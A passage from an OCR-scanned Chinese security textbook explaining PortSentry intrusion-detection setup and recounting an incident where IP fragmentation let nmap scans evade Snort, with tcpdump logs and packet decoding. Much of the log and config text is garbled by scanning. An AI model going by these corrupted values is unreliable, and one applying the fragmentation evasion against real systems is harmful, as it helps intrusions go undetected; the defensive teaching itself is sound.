入 侵 检 测 工具 主要 是 用 来 检测 已 经 发 生 的 和 正在 进行 的 攻击 ,有 些 工 具 甚 至 可 以 和 防火 墙 
实现 “联动 ”， 从 而 采取 一 定 的 措施 来 阻止 这 些 攻 击 。 

目前 入 侵 检测 技术 采取 的 措施 主要 分 为 主动 和 被 动 两 种 。 主 动 方式 会 通过 网 络 监测 器 监听 
网 络 通信 ， 一 旦 察觉 到 可 疑 的 活动 (如 特定 数据 包 的 流入 ) ， 就 会 采取 相应 的 措施 。 当 网 络 上 
有 瞬间 的 攻击 及 大 流量 非法 数据 发 生 时 , 主动 方式 允许 系统 在 攻击 者 发 动 攻击 的 第 一 时 间 做 出 
反应 ， 把 攻击 者 狙击 在 外 。 被 动 方式 是 通过 事后 分 析 日 志 记 录 ， 当 注意 到 有 可 疑 活动 时 ， 系 统 
才 会 采取 相应 的 措施 。 

主流 的 入 侵 检测 工具 软件 有 TCPLogd、Shadow、Snon 等 。 本 节 将 重点 介绍 简单 实用 的 
PortSentry。PortSentry 是 入 侵 检测 工具 中 配置 最 简单 、 效 果 最 直接 的 工具 之 一 。PortSentry 是 
Abacus 工程 的 一 个 组 成 部 分 。Abacus 工程 的 目标 是 建立 一 个 基于 主机 的 网 络 入 侵 检测 系统 ， 
可 以 从 http://www.psonic.com 中 了 解 到 关于 Abacus 工程 更 为 详细 的 信息 。 它 可 以 实时 检测 几 
乎 所 有 类 型 的 网 络 扫描 ， 并 对 扫描 行为 做 出 反应 。 一 旦 发 现 可 疑 的 行为 ，PortSentry 可 以 采取 
如 下 一 些 特定 措施 来 加 强 防范 : 


@ 给 出 虚假 的 路 由 信息 ， 把 所 有 的 信息 流 都 重 定向 到 一 个 不 存在 的 主机 。 
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@ 自动 将 对 服务 器 进行 端口 扫描 的 主机 加 到 TCP-Wrappers 的 /etc/hosts.deny 文件 中 去 。 

@ 通过 netfilter 机 制 ， 利用 包 过 滤 程 序 ， 如 iptables 和 ipchain 等 ， 把 所 有 非法 数据 包 (来 
自 对 服务 器 进行 端口 扫描 的 主机 ) 都 过 滤 掉 。 

@ 通过 syslogO) 函 数 给 出 一 个 日 志 消息 ， 甚 至 可 以 返回 给 扫描 者 一 段 警告 信息 。 


7.2.2 ”PortSentry 的 安装 配置 
下 面 将 详细 介绍 PortSentry 工具 的 安装 和 配置 方法 。 
1. 安装 


从 http://sourceforge.net/projects/sentrytools/ 下 载 软件 的 最 新 版 portsentry-1.2.tar.gz， 用 root 
用 户 执行 如 下 命令 并 进行 安装 : 

#tar zxvf portsentry-1.2.tar.gz 

#cd portsentry-1.2 


#make 


#make install 


2. 修改 配置 文件 portsentry.conf 


通过 PortSentry 进行 入 侵 检测 ， 首 先 需要 为 它 定制 一 份 需 要 监视 的 端口 清单 ， 以 及 相应 的 
阻止 对 策 。 然 后 启动 后 台 进程 ， 对 这 些 端口 进行 检测 ， 一 旦 发 现 有 人 扫描 这 些 端口 ， 就 启动 相 
应 的 对 策 进行 阻拦 。 


(1) 设置 端口 清单 
下 面 给 出 portsentry.conf 中 关于 端口 的 默认 配置 情况 : 


#Un-comment these if You are really anal7 

#TCP_PORTS="1,7,9,11,15,70,79,80,109,110,111,119,138,139,143,512,513,514,5 
15,540,636,1080,1424,2000,2001, [..] 

#UDP_PORTS="1,7,9,66,67,68,69,111,137,138,161,162,474,513,517,518,635, 640, 
641,666,700,2049,31335,27444,34555, [..] 

#Use these if you just want to be aware: 

TCP_PORTS="1,11,15,79,111,119,143,540,635,1080,1524,2000,5742,6667,12345,1 
2346,20034,27665,31337,32771,32772,[..] 

UDP PORTS="1,7,9,69,161,162,513,635,640,641,700,37444,34555,31335,32770,32 
771,32772, 

32773r32714731337754321% 

#Use these for juse bare-bones 

#TCP_PORTS="1,11,15,110,111,143,540,635,180,1524,2000,12345,12346, 20034, 32 
T717327727 
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32773,32774,49724,54320™ 
#UDP_ PORTS="1,7,9,69,161,162,513,640,700,32770,32771,32772,32773,32774,313 
37154321™ 


可 以 有 选择 地 去 掉 前 面 的 注释 来 启用 默认 配置 ,也 可 以 根据 自己 的 实际 情况 定制 一 份 新 的 
清单 ， 格 式 和 原来 的 一 样 即 可 。 端 口 列表 要 根据 具体 情况 而 定 ， 假 如 服务 器 为 Web 服务 器 ， 
那么 Web 端口 就 不 需要 监视 ， 反之， 如 果 是 FTP 服务器， 那么 监视 Web 端口 也 是 有 必要 的 。 


(2) 给 定 相 关 文 件 
在 portsentry.conf 中 还 要 添加 如 下 代码 ， 用 以 指定 相关 文件 的 位 置 : 


# 此 文件 记录 允许 合法 扫描 服务 器 的 主机 地 址 

IGNORE FILE="/usr/local/psionic/portsentry/portsentry.ignore" 
# 此 文件 中 保留 了 以 往 所 有 入 侵 主机 的 IP 历史 记录 

HISTROY FILE="/usr/lcal/psionic/portsentry/portsentry.history" 
# 此 文件 中 是 已 经 被 阻止 连接 的 主机 IP 记录 


BLOCKED FILE="/usr/local/psionic/portsentry/portsentry.blocked" 


(3) 设置 路 由 重 定向 

通过 配置 portsentry.conf 文件 ， 可 以 设置 一 条 虚拟 路 由 记录 ， 把 数据 包 重 定向 到 一 个 未 知 
的 主机 ， 使 之 无 法 获取 信息 。 相 应 的 配置 代码 如 下 : 

#Generic 

#KILL ROUTE="/sbin/route add $TARGET$ 333.444.555.666" 


#Generic Linux 
KILL ROUTE="/sbin/route add -host $TARGET$ gw 333.444.555.666" 


针对 不 同 的 平台 有 不 同 的 路 由 命令 ， 在 配置 文件 中 选择 适合 自己 平台 的 命令 即 可 。 

(4) 利用 其 他 工具 

直接 利用 Linux 中 的 ipchain、iptables、ipfw 和 netfilter 等 命令 , 可 以 切断 攻击 主机 的 连接 : 
KILL ROUTE="/usr/local/sbin/iptables -I INPUT -s $TARGET$ -j DROP" 


也 可 以 直接 把 攻击 者 的 IP 记录 到 /etc/hosts.deny 文件 中 ， 利 用 TCP-Wrappers 保护 机 制 来 
防止 攻击 : 


KILL HOSTS DENY="ALL:$TARGET$ # Portsentry blocked" 


(5) 定制 警告 信息 
可 以 定制 一 条 警告 信息 ， 嘲 笑 一 下 攻击 者 。 不 过 ， 建 议 不 要 使 用 该 选项 ， 因 为 这 样 做 可 能 
会 暴露 主机 的 IDS 系统 。 


PORT BANNER="** UNAUTHORIZED ACCESS PROHIBITED *** 
YOUR CONNECTION ATTEMPT HAS BEEN LOGGED. GO AWAY." 
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修改 完毕 后 ， 改 变 文件 的 权限 ， 以 保证 其 安全 性 : 


#chmod 600 /usr/local/psionic/portsentry/portsentry.conf 


3. 配置 portsentry.i1gnore 文件 


/usr/psionic/portsentry/portsentry.ignore 文件 中 设置 了 希望 PortSentry 忽略 的 主机 人 P， 即 允 
许 合法 扫描 的 主机 地 址 ， 下 面 是 配置 情况 : 


#Put hosts in here You never want blocked,This includes the IP addresses 
#of all local interfaces on the protected host(i.e Virtual host,mult-home) 
#keep 127.0.0.1 and 0.0.0.0 to keep people from playing games. 
12720>021/32 

ODSQ 

#Exclude all local interfaces // 所 有 的 本 地 网 络 IP 

192-1690223 

L92168.254-1 

L27000-1 

#Exclude the default gateway(s) // 默 认 网 关 IP 

192.168.0.10 

#Exclude the nameservers // 域 名 服务 器 IP 

202=101 L703 

202-96°9>18 


修改 完成 后 同样 需要 改变 文件 默认 的 权限 : 


#chmod 600 /usr/local/psionic/portsentry/portsentry.ignore 


7.2.3 ”启动 检测 模式 


最 后 介绍 一 下 PortSentry 的 启动 检测 模式 。 对 应 TCP 和 UDP 两 种 协议 方式 ， 分 别 有 3 种 
启动 模式 ， 如 下 所 示 : 


@ portsentry-tcp，TCP 的 基本 端口 绑 定 模式 。 
portsentry-udp，UDP 的 基本 端口 绑 定 模式 。 
portsentry-stcp，TCP 的 秘密 扫描 检测 模式 。 
portsentry-sudp，UDP 的 秘密 扫描 检测 模式 。 
portsentry-atcp，TCP 的 高 级 秘密 扫描 检测 模式 。 
portsentry-audp，UDP 的 高 级 秘密 扫描 检测 模式 。 


一 般 情况 下 , 建议 使 用 秘密 扫描 检测 模式 或 高 级 秘密 扫描 检测 模式 。 使 用 高 级 秘密 扫描 检 
测 模式 时 (Advanced Stealth Scan Detection Mode) ，PortSentry 会 自动 检查 服务 器 上 正在 运行 
的 端口 ， 然后 把 这 些 端口 从 配置 文件 中 移 去 ， 只 监控 其 他 的 端口 。 这 样 会 加 快 对 端口 扫描 的 
反应 速度 ， 并 且 只 占用 很 少 的 CPU 时 间 。 

启动 PortSentry 的 命令 如 下 : 
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#/usr/psionic/portsentry/portsentry -atcp 


#/usr/psionic/portsentr/portsentr -sudp 


[以 把 启动 命令 加 到 “/etc/re.d/re.local” 上 脚本 文件 中 ， 这 样 当 重 新 启动 计算 机 的 时 候 
PortSentry 就 会 自动 运行 。 如 果 想 让 它 和 其 他 后 台 进 程 一 样 可 以 随时 启动 、 停 止 并 查看 进程 状 
态 ， 可 以 去 http://linux.cudeso.be/linuxdoc/portsentry.php 下 载 一 个 后 台 管理 脚本 ， 把 该 脚本 放 
在 /etc/re.d/ 下 对 应 的 运行 级 别 目录 中 即 可 。 


| 


7.2.4 测试 


启动 PortSentry 后 ， 可 以 用 扫描 器 扫描 服务 器 ，PortSentry 检测 到 扫描 后 ， 会 采取 措施 进 
行 阻 击 ， 并 在 /Usr/local/psionic/portsentry 目录 下 生成 对 应 的 portsentry.blocked.atcp 文件 或 
portsentry.blocked.audp 文件 ， 文 件 记 录 了 发 动 攻 击 的 主机 信息 。 

同时 ，TCP-Wrappers 会 把 非法 主机 的 人 P 添加 到 /etc/host.deny 文件 中 。 这 样 既 切断 了 与 非 
法 主机 之 间 的 通信 ， 又 在 服务 器 上 保留 了 其 犯罪 的 证 据 和 时 间 记 录 , 让 它 无 处 授 形 , 不 可 能 再 
有 进一步 的 非法 行为 。 


7.3 ”利用 IP 碎片 绕 过 Snort 


前 段 时 间 新 闻 里 播 出 了 故宫 展品 被 盗 的 新 闻 , 社会 上 一 时 激 起 不 小 反响 , 谁 也 没 能 想到 戒 
备 森严 的 展厅 却 被 小 偷 光 顾 。 这 时 我 想到 一 些 企业 对 IT 投入 逐步 增 大 ， 部 署 了 各 种 安全 产品 
以 增强 网 络 安全 性 , 真 的 就 能 高 枕 无 忧 了 吗 ? 有 时 候 别 指望 它们 真能 达到 预期 的 效果 。 下 面 笔 
者 就 用 亲身 经 历 讲述 一 起 内 网 服务 器 受 袭 的 安全 事件 。 


7.3.1 事件 发 生 


在 一 个 夜 深 入 静 的 晚上 ， 正 着 加 班 ,我 充分 利用 夜班 时 间 进 行 开发 工作 。 接 下 来 的 工作 是 
在 网 络 内 部 署 Snort， 为 了 检测 新 的 攻击 ， 任 何不 符合 标准 标志 的 异常 数据 包 都 会 被 标记 ， 以 
备 以 后 分 析 。 我 在 防火 墙 前 后 都 建立 一 个 节点 , 而 实际 上 这 个 防火 墙 上 的 漏洞 比 一 块 奶 酷 上 的 
洞 还 多 。 虽 然 从 系统 上 高 度 安全 , 但 是 从 网 络 观点 来 看 则 是 暴露 的 。 这 使 得 在 任何 潜在 攻击 者 
的 眼中 ， 网 络 成 了 一 颗 有 趣 的 宝石 ， 非 常 吸 引 人 。 

时 间 不 经 意 地 跳 过 了 凌晨 3 点 , 这 时 好 像 有 人 正 对 一 台 机 器 RH1 (192.168.1.1) 进行 攻击 ， 
根据 IP 地 址 显示 ， 攻 击 者 来 自 地 球 另 一 端的 某国 家 。 我 的 单 向 文本 报警 器 已 经 进入 报警 模式 
来 警告 有 外 来 的 攻击 。 防火 墙 自动 产生 了 单 向 记录 和 电子 邮件 ， 以 保持 对 入 侵 企图 的 警惕 。 为 
了 安全 起 见 , 我 不 厌 其 烦 地 切换 网 络 入 侵 检测 系统 的 屏幕 开始 比较 日 志 。 外 部 探测 器 检测 到 了 
一 些 试探 性 的 攻击 ， 其 中 包括 一 台 内 部 机 器 的 相当 标准 且 活跃 的 TCP 端口 扫描 。 这 个 用 来 确 
定 Snort 效率 的 双重 嗅 探 器 一 一 NIDS 被 放置 在 防火 墙 内 部 和 外 部 ， 显 示 出 完全 相同 的 记录 。 
这 种 相关 性 说 明 防 火 墙 没有 阻止 任何 数据 包 。 
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接 下 来 的 数据 是 进入 NIDS 的 原始 包 格式 数据 的 复制 。 随 后 ， 抓 包 软 件 tcpdump 开始 进行 
定制 分 析 : 


03:02:30.169272 10.0.0.1.2570 > 192.168.1.1.telnet: S 350598809:350598809(0) 
win 32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30.169534 192.168.1.1.telnet>10.0.0.1.2570:R 0:0(0)ack 350598810 win 0 

03:02:30.169342 10.0.0.1.2571>192.168.1.1.ssh:S 335493470:335493470(0) win 
32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30=:169671 192.168.1.1.ssh >10.0.0.1.2571: 8 359675663:359675663(0) ack 
35493471 win 16060 <mss 1460,sackOK,timestamp 58270[|tcp]> (DF) 

03:02:30.169423 10.0.0.1.2572 >192.168.1.1.6000: S 346081831:346081831 (0) win 
32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03: 02:30.169738 192.168.1.1.6000 >10.0.0.1.2572: S 354267619:354267619(0) ack 
346081832 win 16060 <mms 1460,sackOK,timestamp 58270[|tcp]> (DF) 

03:02:30.169502 10.0.0.1.2573 >192.168.1.1.smtp: S 346774169:346774169(0) win 
32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30.169792 192.168.1.1.smtp >10.0.0.1.2573:R 0:0(0) ack 346774170 win 0 

03:02:30.169580 10.0.0.1.2574 > 192.168.1.lwww: S 341141324:341141324(0) win 
32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30.169834 192.168.1.1.www > 10.0.0.1.2574:R 0:0(0) ack 341141325 win 0 


O330230=T70U9L L000s 人 L257 >192.1680G1 TL-33hs ack i win 
32120<nop,nop,timestamp 65519 58270> (DF) 
03:02:30.170260 0>0=0=1-2572 >192.168.1.1.6000: .ack 7! win 


32120<nop,nop,timestamp 65519 58270> (DF) 

03:02=30=186978 10:0:0e1s2571 >192-168=1=51.5sh:E 1:1(0) ack 1 win 32120 
<nop,nop,timestamp 65521 58270> (DF) 

03:02:30.187462 10050s1.2572: > L005001.25711: ack 2 win 
1l6060<nop,nop,timestamp 58271 65521> (DF) [tos 0x10] 

03:02:30-187462 10%50.0-.1-.2572 >T192-168=1.1.600035 EF 1:1 (0) ack 1 win 32120 
< nop,nop,timestamp 65521 58270> (DF) 

03:02:30=187512 192=168=>1-1:6000 > L000 T2572 ack 2 win 
16060<nop,nop,timestamp 58272 6521> (DF) 

03502:30-188849 192-.168>1。1es3h > T105050s1:2571: Pp 1:16(L5) ack 2 win 16060 
<nop,nop,timestamp 58272 65521> (DF) [tos 0x10] 

03:02:30.189168 10.0.0.1.2571 > 192.168.1.1.ssh:R 335493472:335493472 (0) win 
0 [tos Ox10] 

03:02:30=192461 L92168-1:1-6000 > 10.0:0-1-:2572*: EE 1s1 (0) ack 2 win 16060 
<nop,nop,timestamp 58272 65521> (Df) 

03502s30>192739 10e00e402572 > 392368515 60002 sack 之 win 
32120<nop,nop,timestamp 65521 58272> (DF) 


最 初 的 端口 扫描 可 能 是 对 内 部 网 络 进行 入 侵 的 前 奏 , 可 以 选择 的 唯一 方案 是 调整 防火 墙 的 
规则 设置 ， 以 此 截断 来 自发 起 攻击 的 子 网 的 任何 流量 。 几 分 钟 后 ， 新 的 过 滤器 开始 工作 ， 随 后 
报警 器 和 电子 邮件 报告 有 人 试图 从 一 个 新 的 下 地 址 〈10.1.0.1) 开始 进行 攻击 。 我 的 日 志 相 关 
器 显示 了 外 部 和 内 部 NIDS 日 志 的 差异 , 这 表明 防火 墙 正 在 截取 那些 包 。 新 的 包 数 据 如 下 所 示 : 


03:06:06.928333 10.1.0.1.44003 >192.168.1.1.6000: F 0:0 (0) win 3072 
03:06:06.928393 10.1.0.1.44003 >192.168.1.1.www:F 0:0(0) win 3072 
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03:06:06.928460 10.1.0.1.44003 >192.168.1.1.smtp:F 0:0(0) win 3072 
03:06:06.928530 10.1.0.1.44003 >192.168.1.1.ssh:F 0:0(0) win 3072 
03:06:06-:928599’ 10.1.0.1.44003 >192-.168.1.1:telnet:F 030(0) win 3072 
03:06:06.263621 10.1.0.1.44004 >192.168.1.1.6000: F 0:0(0) win 3072 
03:06:07:263675 10.1.0.,1-44004. >192.168.1.1.55h:. EF” 0:0 (0) wan 3072 
03:06:07.583585 10.1.0.1.44003 > 192.168.1.1.ssh: F 0:0(0) win 3072 
03:06:07.583645 10.1.0.1.44003 >192.168.1.1.6000 : E 0:0(0) win 3072 
03:06:07.904011 10.1.0.1.44004 >192.168.1.1.ssh: F 0:0(0) win 3072 
03:06:07.904068 10.1.0.1.44004 >192.168.1.1.6000 F 0:0(0) win 3072 


这 时 在 网 络 “前 线 ” 好 像 没 有 任何 异常 了 。NIDS 机 器 已 经 停止 发 送 告警 ， 但 这 并 不 能 让 
我 放下 心 来 ， 我 快速 检查 了 系统 负荷 ， 发 现 有 些 不 对 劲 。 通 常 所 有 的 机 器 都 运行 在 最 佳 负荷 。 
然而 ， 一 台 Linux 系统 机 器 RHAS 〈192.168.1.2) 却 显示 了 非常 高 的 平均 负荷 : 


top - 19:00:01 up 200 days, 5:00 ，2 users, load average: 7.01,3.4,2.4 


利用 top 命令 进行 了 快速 检查 ， 并 没有 发 现 什么 非法 的 进程 ， 如 图 7.6 所 示 。 


3:llam up 30 days, luser, load average: 2. 19, 1. 98, 2. 05 

21 processes; 19 sleeping, ] running, 0 zcmbie, 0 stopped 

2PU states: 0. 3% user, 53.4% system, 0. 0% nice, 46. 6% idle 

WMem: 30532k av, 21276K used, 9256K fr 8036K shrd, 1956K 
Swap: 128516K av, OK used, 128516K free 14552K 
i USER PRI NI SIZE RSs SHARE ST LIB %CPU TIME COMMAND 


253 root 2 0 904 904 708 0 3.9 2.9 0:01 ssh 
325 root 20 0 1124 1124 940 R 0 2.9 3.6 0:00 top 
lroot 0 0 188 188 160 8 0 0.0 0.6 0:06 init 
2root 0 0 0 0.0 0.0 0:00 kflushd 
3rot 0 0 0 0.0 0.0 0:00 kupdate 
4root 0 0 0 0.0 0.0 0:00 kpiod 
5 root 0 0 0 0.0 0.0 0:00 kswapd 
52 root 0 0 0 0.0 1.9 0:00 oradngr 
84 root 0 0 0 0.0 2.0 0:00 syslogd 
35 root 0 0 0 0.0 2.8 0:00 klogd 
97 root 0 0 0 0.0 2.0 0:00 sshd 
99 root 0 0 0 0.0 1.7 0:00 erond 
10ldaenon b 0 0 00 1.8 0:00 atd 
109 root 0 0 0 0.0 1.4 0:00 apmd 
lll root 4 0 0 0.0 3.5 0:46 bash 
113 root 0 0 0 0.0 1.3 0:00 agetty 
1l4 root 0 0 0 00 1.3 0:00 agetty 
115 root 0 0 0 0.0 1.3 0:00 agetty 
116 root 0 0 0 0.0 1.3 0:00 agetty 
132 maggie0 0 0 0.0 3.3 0:00 bash 


图 7.6 top 命令 检查 结果 


因为 没有 其 他 人 连接 系统 , 并 且 还 被 告知 有 异常 的 进程 存在 , 因此 我 随即 切断 了 那些 正 流 
入 NIDS 系统 的 原始 数据 。 在 该 数据 库 中 ,发 现 了 另外 一 个 攻击 企图 ， 这 次 攻击 来 自 没 有 检测 
到 的 另 一 个 地 址 〈10.2.0.1) 。 因 此 ， 系 统 没有 发 出 任何 报警 。 

以 下 是 tcpdump 监听 结果 : 


03:10:53.056248 truncated-tcp 16 (frag 46940:16@0+) 

03:10:53.056309 10.2.0.1>192.168.1.2: (frag 46940:4@16) 

03:10:53.056663 192.168.1.2.telnet>10.2.0.1.49052:R 0:0(0)ack 036410064 win 0 
03:10:53.056374 truncated-tcp 16 (frag 32970:16@0+) 

03:10:53.056441 10.2.0.1>192.168.1.2: (frag 32970:4@16) 
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03:10:53.056511 truncated-tcp 16 (frag 29211:16@0+) 

03:10>532056581 1022.0.1>192.1682122 (frag 29211:4816) 

03:10:53.056650 truncated-tcp 16 (frag 37282:16@0+) 

03:10:53.056718 10.2.0.1>192.168.1.2: (frag 37282:4816) 

03:10:53.056857 192.168.1.2.www>10.2.0.1.49052:R 0:0(0) ack 40532387 win 0 
03:10:53.056786 truncated-tcp 16 (frag 27582:16@0+) 

Om0n53056349310 .2.01>192 L601.2r (Frag 27592:4816) 

03:10:53.056987 192.168.1.2.smtp>10.2.0.1.49052:R 0:0(0) ack 083618358 win 0 
03:10:53.384224 truncated-tcp 16 (frag 24040:16@0+) 

03:10:53.384275 10.2.0.1>192.168.1.2: (frag 24040:4@16) 

03:10:53.384344 truncated-tcp 16 (frag 54769:16@0+) 

03:10:53.384412 10.2.0.1>192.168.1.2: (frag 54769:4@16) 

03:10:53.684615 truncated-tcp 16 (frag 43013:16@0+) 

03:10:53.684739 truncated-tcp 16 (frag 30429:16@0+) 

03:10:53.684807 10.2.0.1>192.168.1.2: (frag 30429:4@16) 

03:10:54.004160 truncated-tcp 16 (frag 9068:16@0+) 

03:10:54.004214 10.2.0.1>192.168.1.2: (frag 9068:4@16) 

03:10:54.004281 truncated-tcp 16 (frag 29591:16@0+) 

03:10:54.004351 10.2.0.1>192.168.1.2: (frag 29591:4@16) 


从 上 面 的 结果 可 以 看 出 ， 通 过 nmap 成 功 执行 了 TCP SYN 扫描 。 


7.3.2 故障 处 理 


根据 以 往 的 经 验 ， 晚 上 这 个 时 候 正常 流量 是 最 小 的 ， 除 了 少量 的 Web 浏览 流量 、 电 子 邮 
件 流量 和 内 部 子 网 授权 请 求 流量 外 , 没有 任何 其 他 流量 是 活跃 的 。 攻 击 者 正 是 利用 这 些 流量 中 
的 一 种 来 确定 防火 墙 和 NIDS 系统 的 工作 情况 ， 我 想 最 有 可 能 出 问题 的 就 是 电子 邮件 服务 器 。 
在 继续 行动 之 前 , 我 决定 先 停止 公司 内 邮件 客户 端 并 备份 了 在 受 攻击 期 间 NIDS 机 器 发 送 的 大 
量 消息 。 我 留意 到 ， 大 部 分 消息 是 在 一 次 攻击 发 生 之 后 两 分 钟 收 到 的 , 并 且 在 收 到 电子 邮件 之 
后 的 两 分 钟 紧 接着 出 现 扫描 ,非常 有 规律 。 随 后 ， 我 关闭 了 公司 的 电子 邮件 服务 器 ， 并 重新 配 
置 了 防火 墙 来 拒绝 所 有 来 自 攻 击 者 网 段 的 数据 包 。 现 在 假定 破坏 者 以 某 种 方式 控制 了 电子 邮件 
服务 器 , 在 这 种 前 提 下 我 又 重新 安装 配置 了 一 台电 子 邮 件 服务 器 上 线 ,应 该 就 没 问 题 了 。 随 后 
对 故障 机 器 进行 了 取证 分 析 , 遗憾 的 是 在 替换 下 来 的 电子 邮件 服务 器 上 没有 找到 任何 入 侵 的 证 
据 。 随 后 又 快速 查看 了 NIDS 日 志 ， 原 来 攻击 者 并 没有 察觉 到 防火 墙 上 的 改变 ， 依 然 试图 从 现 
在 被 禁止 的 子 网 发 起 攻击 。 感 党 有 些 眉目 了 ,我 随即 在 纸 上 画 出 了 网 络 拓扑 图 ， 以 便 挖 掘 出 攻 
击 真相 ， 如 图 7.7 所 示 。 
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我 极 快 地 浏览 了 日 志 。 晚上 的 非法 攻击 记录 已 完全 埋没 在 大 量 合法 连接 的 日 志 中 了 。 太 难 
找 了 , 怎么 办 ? 不 一 会 儿 解 决 办 法 逐步 浮现 在 脑海 中 , 我 认为 , 每 一 次 攻击 都 企图 产生 一 个 数 
据 包 , 其 中 包含 了 通过 检查 电子 邮件 的 输出 所 得 到 的 防火 墙 配置 信息 。 这 时 我 可 以 确认 可 能 是 
由 内 部 邮件 服务 器 造成 的 。 然后 在 移 去 了 内 部 电子 邮件 服务 器 以 后 , 这 种 针对 适应 性 的 攻击 也 
就 随 之 停止 了 。 要 想 真正 弄 清 攻 击 的 真相 ， 只 有 仔细 分 析 数 据 包 才 行 。 


7.3.3 数据 包 解码 
下 面 将 继续 研究 日 志 ， 并 尽力 拼凑 它们 来 还 原 出 这 次 攻击 的 原貌 。 
1. 第 1 个 包 的 日 志 


在 后 面 所 出 现 的 日 志 中 ， 每 条 记录 都 是 在 网 络 捕获 的 单独 的 包 。 这 些 包 是 被 一 个 叫做 
tcpdump 的 工具 捕获 的 。 从 这 些 包 中 解码 的 基本 信息 如 下 。 


@ 包 到 达 运 行 tcpdump 的 系统 的 时 间 。 

@ 源 和 目的 IP 地 址 : 是 什么 系统 产生 了 这 些 包 ? 

@ 源 和 目的 TCP 端口 : 是 什么 应 用 程序 产生 了 这 些 包 ? 

@ TCP 标志 : 这 次 通信 是 刚刚 开始 ， 还 是 正在 结束 ， 或 者 是 在 进行 中 ? 
@ TCP 的 序列 号 和 确认 符 : 这 些 包 的 次 序 是 什么 ? 


这 个 数据 包 中 包含 如 下 有 用 的 信息 : 


03:02:30.169272 10.0.0.1.2570 > 192.168.1.1.telnet: S 350598809:350598809(0) 
win 32120 <mms 1460,sackOK,timestamp 65519[|tcp]> (DF) 

@ 到 达 时 间 : 03:02:30.169272。 

@ 源 了 地址: 10.0.0.1。 

@ 源 TCP 端口 : 2570。 

@ 目的 IP 地 址 : 192.168.1.1。 

@ 目的 TCP 端口 : telnet23。 

@ TCP 标志 S: 代表 TCPSYN 同步 标志 ， 这 表明 打开 一 个 TCP 链接 。 
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@ 序列 号 /确认 号 : 350598809/350598809。 
以 下 是 第 1 个 包 的 日 志 : 


03:02:30.169272 10.0.0.1.2570 > 192.168.1.1.telnet: S 350598809:350598809 (0) 
win 32120 <mms 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30.169534 192.168.1.1.telnet >10.0.0.1.2570:R 0:0(0)ack 350598810 win 0 

03:02:30.169342 10-0-0.1.2571>192-168-1-1-.sshzS 3354934710:335493470(0) win 
32120 <mms 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30.169671 192.168.1.1.ssh >10.0.0.1.2571: S 359675663:359675663 (0) ack 
35493471 win 16060 <mss 1460,sackOK,timestamp 58270[|tcp]> (DF) 

03:02:30.169423 10.0.0.1.2572 >192.168.1.1.6000: S 346081831:346081831 (0) win 
32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

0302:30.169738 192.168.1.1.6000 >10.0.0.1.2572: S 354267619:354267619(0) ack 
346081832 win 16060 <mms 1460,sackOK,timestamp 58270[|tcp]> (DF) 

03:02:30.169502 10.0.0.1.2573 >192.168.1.1.smtp: S 346774169:346774169(0) win 
32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30.169792 192.168.1.1.smtp >10.0.0.1.2573:R 0:0(0) ack 346774170 win 0 

03:02:30.169580 10.0.0.1.2574 > 192.168.1.lwww: S 341141324:341141324(0) win 
32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

03:02:30.169834 192.168.1.1.www > 10.0.0.1.2574:R 0:0(0) ack 341141325 win 0 


03302:30=17019L L000 L257L S12 Ld hs -ack 1 win 
32120<nop,nop,timestamp 65519 58270> (DF) 
03:02:30.170260 0=0=0=122572 >192.168.1.1.6000: .ack 1 win 


32120<nop,nop,timestamp 65519 58270> (DF) 

03502:30=-186978, 10050- 工 -2571 >192-168=1 aU-SshsE 21(0) ‘ack 1 win 32120 
<nop,nop,timestamp 65521 58270> (DF) 

03:02:30.187462 10s0a0r1a2572 Ss L000 L257 .ack 2 win 
16060<nop,nop,timestamp 58271 65521> (DF) [tos 0x10] 

03302:30s187462710=0:0:1:2572 > 192s168:1:1:6000: EF 1:1 (0) ack 1 win 32120 
< nop,nop,timestamp 65521 58270> (DF) 

03502230-187512 192.168.1.1.6000 > L100:0.1.2572: = ack 2 win 
16060<nop,nop,timestamp 58272 6521> (DF) 

03:02:30-188849 192-168=1-.1-.3a3h > 106060.1:2571: BP 1:16(15) ack 2 win 16060 
<nop,nop,timestamp 58272 65521> (DF) [tos 0x10] 

03:02:30.189168 10.0.0.1.2571 > 192.168.1.1.ssh:R 335493472:335493472 (0) win 
0 [tos Ox10] 

03:02530192461 192.168.1.1.6000 > 10.0.0.1.:2572: EF 1:1 (0) ack 2 win l6060 
<nop,nop,timestamp 58272 65521> (Df) 

03:02:30-:192739 10.0.0.1.2572 > 192.168.1.1.6000: .ack 2 win 
32120<nop,nop,timestamp 65521 58272> (DF) 


通过 以 上 数据 包 进行 分 析 : 这 是 一 次 TCP 连接 端口 扫描 吗 ? 这 些 数 据 包 从 10.0.0.1 发 出 
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以 连接 受害 者 系统 上 的 哪些 标准 服务 ? 接着 看 下 面 的 日 志 记 录 : 


03:02:30.169502 10.0.0.1.2573 >192.168.1.1.smtp:S 346774169:346774169(0) 
win 32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 


这 条 记录 表明 ， 攻 击 者 送出 了 一 个 TCP SYN 数据 包 ( 以 粗 体 的 S 表示 1， 或 者 是 对 受害 
主机 上 的 服务 发 送 了 初始 化 通信 的 数据 包 。 这 个 数据 包 探 测 受害 主机 是 否 运行 着 一 个 邮件 传输 
代理 程序 , 例如 sendmail。 远程 服务 由 了 P 地 址 后 的 smtp 表示 。 因 为 系统 并 没有 运行 sendmail， 
所 以 没有 看 见 TCP SYN/ACK 数据 包 ， 或 者 标准 的 TCP 响应 数据 包 发 出 。 

但 是 ,日志 显 示 抓 取 了 一 对 数据 包 ， 显 示 受 害 主机 上 运行 着 一 种 服务 : 


03:02:30.169423 10.0.0.1.2572 >192.168.1.1.6000: S 346081831:346081831 (0) 

win 32120 <mss 1460,sackOK,timestamp 65519[|tcp]> (DF) 

0302:30.169738 192.168.1.1.6000 >10.0.0.1.2572: S 354267619:354267619(0) ack 
346081832 win 16060 <mms 1460,sackOK,timestamp 58270[|tcp]> (DF) 

